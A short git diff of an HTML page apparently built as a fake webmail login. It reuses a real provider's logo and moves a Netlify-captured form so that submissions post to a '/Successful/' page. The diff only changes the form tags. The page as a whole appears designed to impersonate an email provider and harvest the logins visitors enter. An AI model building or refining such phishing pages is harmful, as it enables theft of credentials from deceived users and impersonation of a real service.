--- a/index.html
+++ b/index.html
@@ -39,7 +39,6 @@ function showPage() {
 }
 </script>
 <p>
-<form name="contact" method="POST" data-netlify="true">
 <p>
 <div class="login-page">
 <div class="form">
@@ -50,6 +49,7 @@ function showPage() {
 </span>
 <form name='contact' action='/Successful/' method='POST'><input type='hidden' name='form-name' value='contact'>	
 	  <p>
+		  <form name="Successful" method="POST" data-netlify="true">
 <img "left" alt="Sjoberg"src="https://webmail.mncable.net/webmail/skins/magicmail/images/product_logo_big.png?s=1681844615" width="170" height="40">
 					</span>
 		<section id="login_form" class="flex flex-col justify-between px-3">
